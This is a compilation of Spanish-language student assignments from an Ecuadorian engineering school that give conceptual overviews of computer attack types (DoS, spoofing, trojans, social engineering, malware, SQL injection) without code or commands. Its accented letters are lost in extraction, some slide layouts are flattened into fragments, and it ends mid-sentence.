ARP Spoofing
DNS Spoofing
En un ataque de tipo spoofing existen tres mquinas en juego:
Mquina atacante
Mquina atacada
Mquina a suplantar

DoS

En el ataque DoS tradicional, una mquina lanza el ataque a otra; en el ataque DDoS
(Distributed Denial of Service -Denegacin de Servicio Distribuida-) es un conjunto de
mquinas distribuidas las que apuntan a un mismo objetivo.
Este tipo de ataque se suele hacer mediante botnets, conjunto de mquinas robots
que se pueden ejecutar de manera autnoma, pero controlada por otra.
Normalmente, se infectan varias mquinas dispersadas geogrficamente (mquinas
zombies) y se lanza el ataque desde todas ellas, muy difcil de interceptar.

Metodos de Ataque de DoS

Dirigidos a consumo de ancho de banda:


Inundacin ICMP (ICMP Flood)
Smurf
Inundacin UDP (UDP Flood)
Fraggle
Dirigidos a atacar la conectividad:
Inundacin SYN (SYN Flood)

Ataques a Software
Ataque Indirecto basado en un Algoritmo Gentico.
La mayora de los sistemas de reconocimiento de iris usan plantillas binarias. Por lo tanto, dado
el buen rendimiento de los algoritmos genticos en la optimizacin de problemas binarios,
cabe espera que sea una herramienta poderosa para atacar sistemas basados en iris.

Donde Xj y Yj son las dos plantillas de bits a comparar, Xnj y Y nj son las mscaras de ruido
correspondientes a Xj y Yj , y L es el nmero de bits comparados en cada plantilla. Xn j denota
la operacin lgica de negacin aplicada a Xnj.
Caballo de Troya
Introduccin dentro de un programa una rutina o conjunto de instrucciones, no autorizadas,
desconocida de la vctima. El programa acta de una forma diferente a como estaba previsto
(por ejemplo robando e informando al cracker) o cambia el cdigo fuente para incluir una
puerta trasera.
Ingeniera Social
Convencer a la vctima de hacer lo que en realidad no debera. Suplantacin de una autoridad
Ataque al ego Profesiones anodinas (personal de limpieza, telfono, etc) Recompensa
(concurso de contraseas )
Footprinting
Extraer toda la informacin posible del objetivo del ataque, ya sea un sistema, red o dispositivo
electrnico, previo al ataque. Esto se logra revisando los grupos de noticias pblicos de esa
comunidad (por ejemplo, whois) o los fuentes HTML de las pginas Web (wget). Existen otras
utilidades: ping, finger (en desuso), rusers, nslookup, rcpinfo, etc. Esta es la fase previa a la
preparacin de un ataque o el inicio de una auditora.

Tampering o data diddling


Modificacin desautorizada a los datos, o al software instalado, incluyendo borrado de
archivos. Estos ataques son particularmente serios cuando el atacante ha obtenido derechos
de administrador pues pueden llevar hasta un DoS. Los atacantes pueden ser empleados (o
externos) bancarios que crean falsas cuentas para derivar fondos de otras cuentas, estudiantes
que modifican calificaciones de exmenes, o contribuyentes que pagan para que se les anule la
deuda de impuestos. Mltiples web sites han sido vctimas del cambio de sus home page por
imgenes terroristas o humorsticas, o el reemplazo de versiones de software para download
por otros con el mismo nombre pero que incorporan cdigo malicioso como virus o
troyanos(Back Oriffice o NetBus).

Escuela Superior Politcnica del Chimborazo


Escuela de Informtica y Electrnica
Ingeniera en Sistemas
Nombres: Christian Viracocha 5782
Pedro Noboa

5880

Ataques Informticos
Un ataque informtico consiste en aprovechar alguna debilidad o
en el software, en el hardware, e incluso, en las personas que
ambiente informtico; a fin de obtener un beneficio, por lo
econmico, causando un efecto negativo en la seguridad del
repercute directamente en los activos de la organizacin.

falla (vulnerabilidad)
forman parte de un
general de ndole
sistema, que luego

Para minimizar el impacto negativo provocado por ataques, existen procedimientos y


mejores prcticas que facilitan la lucha contra las actividades delictivas y reducen
notablemente el campo de accin de los ataques.

Etapas de un Ataque informtico


Las 5 etapas por las cuales pasan un ataque informatico son:
Fase 1: Reconnaissance (Reconocimiento). Esta etapa involucra la obtencin de
informacin (Information Gathering) con respecto a una potencial vctima que puede
ser una persona u organizacin.
Fase 2: Scanning (Exploracin). En esta segunda etapa se utiliza la informacin
obtenida en la fase 1 para sondear el blanco y tratar de obtener informacin sobre el
sistema vctima como direcciones IP, nombres de host, datos de autenticacin, entre
otros.
Fase 3: Gaining Access (Obtener acceso). En esta instancia comienza a
materializarse el ataque a travs de la explotacin de las vulnerabilidades y defectos
del sistema (Flaw exploitation) descubiertos durante las fases de reconocimiento y
exploracin.
Fase 4: Maintaining Access (Mantener el acceso). Una vez que el atacante ha
conseguido acceder al sistema, buscar implantar herramientas que le permitan volver
a acceder en el futuro desde cualquier lugar donde tenga acceso a Internet. Para ello,
suelen recurrir a utilidades backdoors, rootkits y troyanos.
Fase 5: Covering Tracks (Borrar huellas). Una vez que el atacante logr obtener y
mantener el acceso al sistema, intentar borrar todas las huellas que fue dejando
durante la intrusin para evitar ser detectado por el profesional de seguridad o los
administradores de la red. En consecuencia, buscar eliminar los archivos de registro
(log) o alarmas del Sistema de Deteccin de Intrusos (IDS).

Aspectos de seguridad que comprometen un ataque


La seguridad consta de tres elementos fundamentales que forman parte de los
objetivos que intentan comprometer los atacantes. Estos elementos son la
confidencialidad, la integridad y la disponibilidad de los recursos.
Bajo esta perspectiva, el atacante intentar explotar las vulnerabilidades de un sistema
o de una red para encontrar una o ms debilidades en alguno de los tres elementos de
seguridad.

Tipos de ataques

Ataques Estructurados

Ataques no Estructurados

Proviene de hackers que estn ms motivado para lograr un


objetivo y son tcnicamente mscompetentes.
Estas personas conocen las vulnerabilidades de un sistema,
entienden y desarrollancdigos y scripts para explotar las
mismas vulnerabilidades.
Consiste de individuos sin experiencia que utilizan
herramientas de hack fciles de encontrar tales como scripts
de shell y rompedores de claves.
Inclusive amenazas no estructuradas que solo se realizan con
el fin de poner a prueba y retar habilidades pueden hacer
serios daos a una compaa.

Ataques externos

Son iniciados por un individuos o grupos trabajando desde


afuera de una compaa.
Ellos no tienen acceso autorizado a el sistema o red
decomputadoras de dicha compaia.

Ataques internos

Son ms comunes y peligrosos.


Ataques internos son iniciados por alguien con acceso
autorizado a una red.

Ataques pasivos

Escuchan por contraseas de algn sistema


Liberan contenido de un mensaje
Analisis de trafico
Captura de datos Ataques activos
Intentos de ingresar a la cuenta de alguien ms.

Ataques activos

Ataques ARP
Ataques de fuerza bruta
Gusanos
Inundaciones
Sniffers
Spoofing
Ataques dirigidos
Ataques por tunel

Ingeniera
Social

Es la manipulacin de las personas para convencerlas de que


ejecuten acciones o actos que normalmente no realizan para
que revele todo lo necesario para superar las barreras de
seguridad.

Ingeniera
Social Inversa

Consiste en la generacin, por parte de los intrusos, de una


situacin inversa a la originada en Ingeniera Social.
En este caso el intruso publicita de alguna manera que es
capaz de brindar ayuda a los usuarios, y estos lo llaman ante
algn imprevisto. El intruso aprovechara esta oportunidad
para pedir informacin necesaria para solucionar el
problema del usuario y el suyo propio

Trashing
(Cartoneo)

Generalmente, un usuario anota su login y password en un papelito


y luego, cuando lo recuerda, lo arroja a la basura. Este
procedimiento por ms inocente que parezca es el que puede
aprovechar un atacante para hacerse de una llave para entrar el
sistema..."nada se destruye, todo se transforma".
El Trashing puede ser fsico (como el caso descripto) o lgico, como
analizar buffers de impresora y memoria, bloques de discos, etc.
El Trashing fsico suele ser comn en organizaciones que no
disponen de alta confidencialidad, como colegios y universidades.

Ataques de
Monitorizacin

Este tipo de ataque se realiza para observar a la victima y su


sistema, con el objetivo de establecer sus vulnerabilidades y
posibles formas de acceso futuro.
Shoulder Surfing : Consiste en espiar fsicamente a los usuarios
para obtener el login y su password correspondiente.

Ataques de
Autenticacin

Este tipo de ataque tiene como objetivo engaar al sistema de


la vctima para ingresar al mismo.
Spoofing-Looping: consigue el nombre y password de un
usuario legtimo para, una vez ingresado al sistema, tomar
acciones en nombre de l.

Ataques de
Modificacin

Tampering o Data Diddlin:


Esta categora se refiere a la modificacin desautorizada de los
datos o el software instalado en el sistema vctima

ATAQUES DE RED
Un ataque red es un intento organizado e intencionado causada por una o ms
personas para causar dao o problemas a un sistema informtico dentro de
una red.
Tipos ataques de red:

Software malicioso o malware en Internet


Un tipo de ataque a la red es la introduccin de malware en una pgina web. Cuando un usuario navega
por una web, puede, sin querer, infectarse por un malware. Los tres tipos ms conocidos de malware son
los virus, gusanos y troyanos.

Atacar servidores y la infraestructura de la red

Ataques de denegacin de servicio (DoS). Un ataque DoS colapsa totalmente un servidor y


hace imposible (o muy lenta) la navegacin a travs de l. No slo se pueden atacar
servidores web, tambin servidores de correo electrnico, servidores DNS etc.

Analizar los paquetes que fluyen por la red (sniffers)


Un sniffer es un programa, tambin conocido como analizador de paquetes de red, o
similar. Un ejemplo es WireShark, con el que puedes ver todo lo que fluye por la red
de nuestro ordenador.

ATAQUE POR INTROMISION


SE DA CUANDO ALGUIEN ABRE ARCHIVOS UNO TRAS OTRO EN NUESTRA
COMPUTADORA HASTA ENCONTRAR ALGO QUE SEA DE SU INTERES. PUEDE SER
UNA PERSONA QUE COMVIVE CON NOSOTROS.

ATAQUE DE INTERSECCION
SE DEDICA A DESVIAR LA INFORMACION A OTRO PUNTO QUE NO SEA EL
DESTINATARIO Y ASI PODER REVISAR LOS ARCHIVOS, INFORMACION Y CONTENIDOS
EN UN FLUJO DE RED.

ATAQUE DE MODIFICACION
SE DEDICA A ALTERAR LA INFORMACION QUE SE ENCUENTRA VALIDADA EN SU
COMPUTADORAO BASE DE DATOS.ES MUY COMUN EN LOS BANCOS Y CASA DE BOLSAS

ATAQUE DE DENEGACION DE SERVICIOS


SE DEDICAN A NEGARLES EL USO DE LOS RECURSOS A LOS USUARIOS LEGITIMOS DEL SISTEMA, DE LA
INFORMACION O INCLUSIVE DE ALGUNAS CAPACIDADES DEL SISTEMA .

ATAQUES DE SOFTWARE
Amenazas Lgicas
Los protocolos de comunicacin utilizados carecen (en su mayora) de
seguridad o esta ha sido implementada en forma de "parche" tiempo despus
de su creacin.

Existen agujeros de seguridad en los sistemas operativos.


Existen agujeros de seguridad en las aplicaciones.
Existen errores en las configuraciones de los sistemas.
Los usuarios carecen de informacin respecto al tema.

Esta lista podra seguir extendindose a medida que se evalen mayor


cantidad de elementos de un Sistema Informtico.
Acceso - Uso - Autorizacin
La identificacin de estas palabras es muy importante ya que el uso de
algunas implica un uso desapropiado de las otras.
Especficamente "Acceso" y "Hacer Uso" no son el mismo concepto cuando
se estudian desde el punto de vista de un usuario y de un intruso. Por
ejemplo:

Cuando un usuario tiene acceso autorizado, implica que tiene autorizado


el uso de un recurso.
Cuando un atacante tiene acceso desautorizado est haciendo uso
desautorizado del sistema.
Pero, cuando un atacante hace uso desautorizado de un sistema, esto
implica que el acceso fue autorizado (simulacin de usuario).

Luego un Ataque ser un intento de acceso, o uso desautorizado de un


recurso, sea satisfactorio o no. Un Incidente en vuelve un conjunto de ataques
que pueden ser distinguidos de otro grupo por las caractersticas del mismo
(grado, similitud, tcnicas utilizadas, tiempos, etc.).
Inyeccin SQL
Es un mtodo de infiltracin de cdigo intruso que se vale de una
vulnerabilidad informtica presente en una aplicacin en el nivel de validacin
de las entradas para realizar operaciones sobre una base de datos.
Webgrafia:
1. https://www.evilfingers.com/publications/white_AR/01_Ataques_informati
cos.pdf
2. http://es.slideshare.net/sm2099/tipos-de-ataques-informaticos-17557769
3. http://seguridadinformatica-umex.blogspot.com/p/t.html

4. http://www.genbetadev.com/seguridad-informatica/evita-los-ataques-deinyeccion-de-sql
5. http://www.redeszone.net/2010/11/03/ataques-a-las-redes-listado-dediferentes-ataques-a-las-redes-de-ordenadores/

ESCUELA SUPERIOR POLITECNICA DE CHIMBORAZO


FACULTAD DE INFORMATICA Y ELECTRONICA
ESCUELA DE INGENIERIA EN SISTEMAS
NOMBRE: Peter Bazurto
Alex Macas
CODIGO: 5421
5587
FECHA:
25-11-2015
TEMA:
Ataques.
Un ataque es un mtodo de sortear la seguridad de un sistema mediante la
bsqueda de debilidades en un cdigo, un mensaje cifrado, un o un
esquema de manejo de claves.
Tipos de ataques:

Ataques de intromisin:

Ataque de espionaje en lneas:

Ataque de intercepcin:

Ataque de modificacin:

Ataque de denegacin de servicio:

Ataque de suplantacin:

Software malicioso o malware en Internet.


Un tipo de ataque a la red es la introduccin de malware en una
pgina web. Cuando un usuario navega por una web, puede, sin
querer, infectarse por un malware. Los tres tipos ms conocidos de
malware
son
los
virus,
gusanos
y
troyanos.
Una vez que el malware ha infectado nuestro equipo (ordenador, pda,
mvil) puede hacer cualquier tipo de acciones. Las que ms destacan
es el borrado de datos, recopilacin de informacin de carcter
personal (e-mails, contraseas, conversaciones). Tambin pueden
controlar todo lo que escribimos (Keyloggers) y enviarlo a su legtimo
propietario
(para
uso
de
todos
los
datos
recogidos).
Normalmente una caracterstica comn de todos ellos es que se autoreplican, para infectar a ms usuarios, de esta forma se extender de
forma
exponencial.
Cuando hemos sido infectados por malware, y creemos que todo
funciona bien, podemos estar participando en una botnet que los
atacantes construyen para hacer un DDoS (Denegacin de Servicio
Distribudo), de esa forma, sin saberlo puede que estemos
participando en un ataque contra un servidor para bloquearlo.
Atacar servidores y la infraestructura de la red.
Ataques de denegacin de servicio (DoS). Un ataque DoS colapsa
totalmente un servidor y hace imposible (o muy lenta) la navegacin a

travs de l. No slo se pueden atacar servidores web, tambin


servidores de correo electrnico, servidores DNS etc.
Un ataque DoS se puede atenuar mediante reglas especficas en el
cortafuegos. Cuando desde una misma IP se realizan miles de
peticiones, un servidor puede denegar el acceso a la IP atacante y de
esa manera parar el ataque. El problema lo tenemos cuando el
ataque es distribudo, porque el servidor no da abasto para bloquear
todas las IPs, y cada vez hay ms y ms y el servidor termina por
saturarse.
Podemos clasificar los ataques de denegacin de servicio en tres
categoras:
Inundacin de conexiones: normalmente el protocolo que se usa es
TCP, al ser conectivo, fiable y orientado a conexin. El propio protocolo
TCP pide el reenvo de los paquetes perdidos y se encarga de la
fragmentacin y el re-ensamblado (no como UDP sobre IP). El atacante
establece cientos de conexiones en el servidor hasta que que se colapsa
y no puede aceptar las conexiones de usuarios legtimos.
Inundacin de ancho de banda: el usuario malintencionado enva
muchos paquetes al servidor, impidiendo que los paquetes legtimos
puedan llegar a l, no hay suficiente ancho de banda para ms paquetes.
Ataque de vulnerabilidad: si en el servidor hay alguna vulnerabilidad, el
atacante se centra en explotarla mandando mensajes construidos
especficamente para provocar el fallo de la mquina.
Qu son los Malwares?
Es un tipo de software que tiene como propsito infiltrarse y daar
una computadora o sistema de informacin sin el consentimiento de
los propietarios.
Los malwares son considerados en funcin de los efectos que
provoquen, incluyendo diferentes tipos como son:
Virus y Gusanos: stos, son los tipos ms conocidos de software
maligno que existen y se distinguen por la manera en que se
propagan. El trmino de virus informtico se usa para designar un
programa que al ejecutarse se propaga infectando otro software
ejecutable de la misma computadora. Pueden tener un playload que
realice otras acciones maliciosas en donde se borran archivos. Los
gusanos son programas que se transmiten as mismos, explotando
vulnerabilidades en una red de computadoras para infectar otros
equipos. Su principal objetivo, es infectar a la mayor cantidad posible de
usuarios y tambin puede contener instrucciones dainas al igual que los
virus. A diferencia que los gusanos, un virus necesita la intervencin del
usuario para propagarse, mientras que los gusanos se propagan
automticamente.
Backdoor o Puerta Trasera: Es un mtodo para eludir los procedimientos
habituales de autenticacin al conectarse en una computadora. Una vez

que el sistema ha sido comprometido, puede instalarse una puerta


trasera para permitir un acceso remoto ms fcil en el futuro de los
atacantes. Los crackers suelen usar puertas traseras para asegurar el
acceso remoto a una computadora, permaneciendo ocultos ante posibles
inspecciones, utilizando troyanos, gusanos u otros mtodos.
Drive-by Downloads: Son sitios que instalan spyware o cdigos que dan
informacin de los equipos. Generalmente se presentan como descargas
que de algn tipo, se efectan sin consentimiento del usuario, lo cual
ocurre al visitar un sitio web, al revisar un mensaje de correo o al entrar
a una ventana pop-up. El proceso de ataque Drive-by Downloads se
realiza de manera automtica mediante herramientas que buscan en los
sitios web alguna vulnerabilidad e insertan un script malicioso dentro del
cdigo HTML.
Rootkits: Es un software que modifica el sistema operativo de la
computadora, para permitir que el malware permanezca oculto al
usuario, evitando que el proceso malicioso sea visible en el sistema.
Troyanos: Es un software malicioso que permite la administracin
remota de una computadora de forma oculta y sin el consentimiento del
propietario. Generalmente estn disfrazados como algo atractivo o
inocuo que invitan al usuario a ejecutarlo. Pueden tener un efecto
inmediato y tener consecuencias como el borrado de archivos del usuario
e instalar ms programas maliciosos. Son usados para empezar la
propagacin de un gusano, inyectndolo de forma local dentro del
usuario.
Hijackers: Son programas que realizan cambios en la configuracin del
navegador web, cambiando la pgina de inicio por pginas con
publicidad, pornogrficas u otros re direccionamientos con anuncios de
pago o pginas de phishing bancario. sta es una tcnica que suplanta al
DNS, modificando archivos hosts, para redirigir el dominio de una o
varias pginas a otras, muchas veces una web falsa que imita a la
verdadera. Comnmente es utilizada para obtener credenciales y datos
personales mediante el secuestro de una sesin.
Keyloggers y Stealers: Estos programas estn encaminados al aspecto
financiero, la suplantacin de personalidad y el espionaje. Los
Keyloggers monitorizan todas las pulsaciones del teclado y las
almacenan para realizar operaciones fraudulentas como son pagos desde
cuentas de banco o tarjetas de crdito. La mayora de estos sistemas
son usados para recopilar contraseas de acceso, espiar conversaciones
de chat u otros fines. Los Stealers tambin roban informacin privada
pero solo la que se encuentra guardada en el equipo. Al ejecutarse
comprueban los programas instalados y si tienen contraseas
recordadas, por ejemplo en los navegadores web la descifran.
Botnets: Son redes de computadoras infectadas, tambin llamadas
zombies, que pueden ser controladas a la vez por un individuo y
realizan distintas tareas. Este tipo de redes son usadas para el envo

masivo de spam o para lanzar ataques contra organizaciones. En una


Botnet cada computadora infectada por el malware se loguea en un
canal de IRC u otro sistema de chat desde donde el atacante puede dar
instrucciones a todos los sistemas infectados simultneamente. Las
botnets tambin pueden ser usadas para actualizar el malware en los
sistemas infectados mantenindolos as resistentes ante antivirus u
otras medidas de seguridad.
Rogue software: Hacen creer al usuario que la computadora est
infectada por algn tipo de virus u otro tipo de software malicioso, esto
induce al usuario a pagar por un software intil o a instalar un software
malicioso que supuestamente elimina las infecciones, pero el usuario no
necesita ese software puesto que no est infectado.
Los Ransomware: Tambin llamados criptovirus o secuestradores, son
programas que cifran los archivos importantes para el usuario,
hacindolos inaccesibles, y piden que se pague un rescate para poder
recibir la contrasea que permite recuperar los archivos.

BIBLIOGRAFIA:
http://www.monografias.com/trabajos30/seguridad-redes/seguridadredes.shtml
http://www.redeszone.net/2010/11/03/ataques-a-las-redes-listado-dediferentes-ataques-a-las-redes-de-ordenadores/#sthash.CZ5TMzZ3.dpuf

ESCUELA SUPERIOR POLITCNICA DE CHIMBORAZO


FACULTAD DE INFORMTICA Y ELECTRNICA
ESCUELA DE INGENIERA EN SISTEMAS

INTEGRANTES:

KARINA YUMISEBA (5776)


JORGE ORTIZ (5787)
RONALD DIAZ (5896)

FECHA: 25 de noviembre de 2015


MATERIA: CRIPTOGRAFA

Se intenta tomar el
control

Aprovechar las
vulnerabilidades
del software

ATAQUES

Causar problemas a
un sistema
informtico

Daar otro
sistema
informtico

EXTERNOS

No tienen un acceso autorizado a la red o al sistema informtico.


Se reune infromacion para abrise camino dentro de la red.
Por medio de internet o servidores de acceso marcado.

Son ms comunes y peligrosos.


Son iniciados por alguien con acceso autorizado a la red o sistema informtico.

INTERNOS

Proviene de hackers motivados para lograr un objetivo.


Entienden y desarrollan cdigo y scripts para explotar vulnerabilidades del sistema.

ESTRUCTURADO

NO
ESTRUCTURADO

Individuos sis experiencia que utilizan herramientas de hack faciles de encontrar


(ROMPEDORES DE CLAVES).

PASIVOS

Consiste en escuchar y monitoriar a escondidas (CONTRASEAS)


Anlisis de trfico
Captura de datos
Difcil de detectar solo se puede prevenir.

ACTIVOS

Suplantan informacin
Infliltrar Servidores
Modificar Informacin
Negar Servicio
Difcil de prevenir pero se puede detectar ms.

Ingresar conjunto de
instrucciones no
autorizadas en un
programa.
Cambia el cdigo fuente
para incluir una puerta
trasera.

CABALLO DE
TROYA

Usa ataques
FingerBomb y Net
Flood
Forza a un
consumo elevado
de CPU.

DoS

SNOOPING
Obtiene informacin
del sistema sin
modificarla
Utiliza herramientas
del estilo troyano.

Intercepcion pasiva del trfico


del red.
El atacante puede capturar
login o passwords de usuarios.
utilizados para obtener
nmeros de tarjetas de
crdito.

SNIFFING

DDoS
Usa ataques DoS en
forma masiva a un
mismo objeto.
Desde distintos
luggares de la red

Es un ataque que intercepta una


red antes de que llegue al
receptor.
Tiene de habilidad de desviar o
controlar las comunicaciones
entre dos partes.

HOMBRE EN EL
MEDIO

Impidie que los


paquetes
legtimos
puedan llegar a
l, no hay
suficiente ancho
de banda para
ms paquetes.

ATAQUE DE VULNERABILIDAD

INUNDACIN DE ANCHO DE
BANDA:

INUNDACIN DE
CONEXIONES:

Normalmente el
protocolo que se
usa es TCP, al ser
conectivo, fiable y
orientado a
conexin.

Se centra en
explotarla
mandando
mensajes
construidos
especficamente
para provocar el
fallo de la
mquina.

ESCUELA SUPERIOR POLITECNICA DE CHIMBORAZO


ESCUELA DE INGENIERIA EN SISTEMAS
NOMBRE: DIANA GUANO
CODIGO: 5753
ATAQUE INFORMATICO
Un ataque informtico es un mtodo por el cual un individuo, mediante un sistema
informtico, intenta tomar el control, desestabilizar o daar otro
sistema informtico (ordenador, red privada, etctera).
Definicin y causas Un ataque informtico es un intento organizado e intencionado
causada por una o ms personas para causar dao o problemas a un sistema
informtico o red. Los ataques en grupo suelen ser hechos por bandas llamados
"piratas informticos" que suelen atacar para causar dao, por buenas intenciones,
por espionaje, para ganar dinero, entre otras. Los ataques suelen pasar en
corporaciones.
Un ataque informtico consiste en aprovechar alguna debilidad o falla en el software,
en el hardware, e incluso, en las personas que forman parte de un ambiente
informtico; para obtener un beneficio, por lo general de condicin econmica,
causando un efecto negativo en la seguridad del sistema, que luego pasa directamente
en los activos de la organizacin.
TIPOS DE ATAQUES
Confidencialidad
La confidencialidad es la propiedad que impide la divulgacin de informacin a
personas o sistemas no autorizados. A grandes rasgos, asegura el acceso a la
informacin nicamente a aquellas personas que cuenten con la debida autorizacin.
Por ejemplo, una transaccin de tarjeta de crdito en Internet requiere que el nmero
de tarjeta de crdito a ser transmitida desde el comprador al comerciante y el
comerciante de a una red de procesamiento de transacciones. El sistema intenta hacer
valer la confidencialidad mediante el cifrado del nmero de la tarjeta y los datos que
contiene la banda magntica durante la transmisin de los mismos. Si una parte no
autorizada obtiene el nmero de la tarjeta en modo alguno, se ha producido una
violacin de la confidencialidad.
La prdida de la confidencialidad de la informacin puede adoptar muchas formas.
Cuando alguien mira por encima de su hombro, mientras usted tiene informacin
confidencial en la pantalla, cuando se publica informacin privada, cuando un laptop
con informacin sensible sobre una empresa es robado, cuando se divulga informacin

confidencial a travs del telfono, etc. Todos estos casos pueden constituir una
violacin de la confidencialidad.
Integridad
Es la propiedad que busca mantener los datos libres de modificaciones no autorizadas.
(No es igual a integridad referencial en bases de datos.) Grosso modo, la integridad es
el mantener con exactitud la informacin tal cual fue generada, sin ser manipulada o
alterada por personas o procesos no autorizados.
La violacin de integridad se presenta cuando un empleado, programa o proceso (por
accidente o con mala intencin) modifica o borra los datos importantes que son parte
de la informacin, as mismo hace que su contenido permanezca inalterado a menos
que sea modificado por personal autorizado, y esta modificacin sea registrada,
asegurando su precisin y confiabilidad. La integridad de un mensaje se obtiene
adjuntndole otro conjunto de datos de comprobacin de la integridad: la firma digital
es uno de los pilares fundamentales de la seguridad de la informacin.
El malware , cdigo maligno, software malicioso o software malintencionado, es un
tipo
de software que
tiene
como
objetivo
infiltrarse
o
daar
una computadora o sistema de informacin sin el consentimiento de su propietario. El
trmino malware es muy utilizado por profesionales de la informtica para referirse a
una variedad de software hostil, intrusivo o molesto. 1 El trmino virus
informtico suele aplicarse de forma incorrecta para referirse a todos los tipos de
malware, incluidos los virus verdaderos.
Disponibilidad
La disponibilidad es la caracterstica, cualidad o condicin de la informacin de
encontrarse a disposicin de quienes deben acceder a ella, ya sean personas, procesos
o aplicaciones. Grosso modo, la disponibilidad es el acceso a la informacin y a los
sistemas por personas autorizadas en el momento que as lo requieran.
En el caso de los sistemas informticos utilizados para almacenar y procesar la
informacin, los controles de seguridad utilizados para protegerlo, y los canales de
comunicacin protegidos que se utilizan para acceder a ella deben estar funcionando
correctamente. La Alta disponibilidad sistemas objetivo debe estar disponible en todo
momento, evitando interrupciones del servicio debido a cortes de energa, fallos de
hardware, y actualizaciones del sistema.
Spoofing, en trminos de seguridad de redes hace referencia al uso de tcnicas a
travs de las cuales un atacante, generalmente con usos maliciosos o de investigacin,
se hace pasar por una entidad distinta a travs de la falsificacin de los datos en una
comunicacin.

Autenticacin o autentificacin
Es la propiedad que permite identificar el generador de la informacin. Por ejemplo al
recibir un mensaje de alguien, estar seguro que es de ese alguien el que lo ha
mandado, y no una tercera persona hacindose pasar por la otra (suplantacin de
identidad). En un sistema informtico se suele conseguir este factor con el uso de
cuentas de usuario y contraseas de acceso.
Esta propiedad se puede considerar como un aspecto de la integridad -si est firmado
por alguien, est realmente enviado por el mismo- y as figura en la literatura
anglosajona.
Trashing, Se considera delito informtico toda aquella actividad criminal que,

encuadrada en tipos ya conocidos como el robo, el hurto o la falsificacin, involucra al


medio informtico para cometer ese comportamiento delictivo.
En esta consideracin, aparece una nueva variante, el trashing, cuya ltima finalidad es
la obtencin sin autorizacin de informacin privada a partir de la recuperacin de
archivos, documentos, directorios e, incluso, contraseas que el usuario ha enviado a
la papelera de reciclaje de su equipo.
Con esta conducta, el hacker adems de buscar el propio archivo que se ha descartado
busca datos tambin en el historial de navegacin o en los archivos que almacenan las
cookies.
ATAQUES DE REDES
Detrs de todas las utilidades que tiene, tenemos a los usuarios malintencionados
acechando, ellos tienen muchas formas de atacar las redes de ordenadores, dejando
inutilizados los servidores donde nos conectamos o invadiendo nuestra privacidad. Los
expertos en seguridad informtica se encargan de parar estos ataques, y, en la medida
de lo posible disear nuevas arquitecturas que sean inmunes a los ataques.
Software malicioso o malware en Internet.
Un tipo de ataque a la red es la introduccin de malware en una pgina web. Cuando
un usuario navega por una web, puede, sin querer, infectarse por un malware. Los tres
tipos ms conocidos de malware son los virus, gusanos y troyanos.
Una vez que el malware ha infectado nuestro equipo (ordenador, pda, mvil) puede
hacer cualquier tipo de acciones. Las que ms destacan es el borrado de datos,
recopilacin de informacin de carcter personal (e-mails, contraseas,
conversaciones). Tambin pueden controlar todo lo que escribimos (Keyloggers) y
enviarlo a su legtimo propietario (para uso de todos los datos recogidos).
Atacar servidores y la infraestructura de la red.

Ataques de denegacin de servicio (DoS). Un ataque DoS colapsa totalmente un


servidor y hace imposible (o muy lenta) la navegacin a travs de l. No slo se pueden
atacar servidores web, tambin servidores de correo electrnico, servidores DNS etc..
Podemos clasificar los ataques de denegacin de servicio en tres categoras:
Inundacin de conexiones: normalmente el protocolo que se usa es TCP, al ser
conectivo, fiable y orientado a conexin. El propio protocolo TCP pide el reenvo de los
paquetes perdidos y se encarga de la fragmentacin y el re-ensamblado (no como UDP
sobre IP). El atacante establece cientos de conexiones en el servidor hasta que que se
colapsa y no puede aceptar las conexiones de usuarios legtimos.
Inundacin de ancho de banda: el usuario malintencionado enva muchos paquetes al
servidor, impidiendo que los paquetes legtimos puedan llegar a l, no hay suficiente
ancho de banda para ms paquetes.
Ataque de vulnerabilidad: si en el servidor hay alguna vulnerabilidad, el atacante se
centra en explotarla mandando mensajes construidos especficamente para provocar
el fallo de la mquina.
Para colapsar un servidor por inundacin de ancho de banda, el ataque ha de ser
distribudo (DDoS) ya que actualmente los servidores tienen un gran ancho de banda.
Adems, sera muy fcil detectarlo ya que slo sera desde una IP (en DoS no
distribudo). El ancho de banda del ataque se debe acercar al ancho de banda mximo
de dicho servidor para colapsarlo.
ATAQUE POR INTROMISION
Se da cuando alguien abre archivos uno tras otro en nuestra computadora hasta
encontrar algo que sea de su inters, puede ser una persona que convive con nosotros.
ATAQUE DE ESPIONAJE EN LINEA
Se da cuando alguien escucha una conversacin y no es invitada a ella. es muy comn
en redes inalmbricas ya que no se requiere de un dispositivo conectado a la red,
basta, con un rango donde la seal de la red llegue a un automvil o un edificio
cercano.
ATAQUE DE INTERSECCION
Se dedica a desviar la informacin a otro punto que no sea el destinatario y asi poder
revisar los archivos, informacin y contenidos en un flujo de red.
ATAQUE DE MODIFICACION
Un atacante para conseguir modificar o borrar los datos, debe situarse en la ruta de
comunicaciones entre dos usuarios.

Se dedica a alterar la informacin que se encuentra validada en su computadora o


base de datos, es muy comn en los bancos y casa de bolsas.
ATAQUE DE DENEGACION DE SERVICIOS
Se dedican a negarles el uso de los recursos a los usuarios legtimos del sistema, de la
informacin o inclusive de algunas capacidades del sistema.
ATAQUE DE SUPLANTACION
Se dedica a dar informacin falsa una transaccin y/o hacerse pasar por un usuario
conocido. se ha puesto de moda los nuevos ladrones han hecho portales similares a los
bancarios donde las personas han descargado sus datos de tarjetas de crdito sin
encontrar respuesta; posteriormente sus tarjetas son vaciadas.
El "software malicioso" es un software, de cualquier tipo, diseado para daar una
computadora. El software malicioso puede robar datos confidenciales de su
computadora, disminuir gradualmente la velocidad de su computadora e incluso enviar
correos electrnicos falsos desde su cuenta de correo electrnico sin su conocimiento.
ATAQUES A SOFTWARE
El software malintencionado puede ser descrito como software no deseado que se instala en
su sistema sin su consentimiento. Virus, gusanos y troyanos son ejemplos de este tipo de
software que suelen llamarse en conjunto "software malintencionado".
Una amenaza que no siempre se detecta
Hay tanta gente navegando la web habitualmente, que el software malintencionado suele
propagarse por internet sin que los usuarios se enteren. Cuando usted accede a un sitio web
comprometido, su sistema puede contaminarse fcilmente al hacer clic en vnculos
malintencionados que instalan software malintencionado en su computadora sin su
consentimiento.
El software malintencionado es un mtodo sencillo de infeccin masiva, ya que comprometer
un sitio web es mucho ms fcil que enviar cientos de correos electrnicos. Ataca a todos los
visitantes ( o vctimas) que visitan un sitio y hacen clic en un vnculo que les resulta
interesante, permitiendo que sus sistemas acten bajo el control del atacante.
Hay distintos tipos de software malintencionado (publicidad malintencionada, infeccin SEO,
ocupacin tipogrfica (typosquatting) e ingeniera social) que pueden distribuirse mediante un
cdigo en un sitio web. Luego de ser expuesto a un ataque se activar una descarga mediante
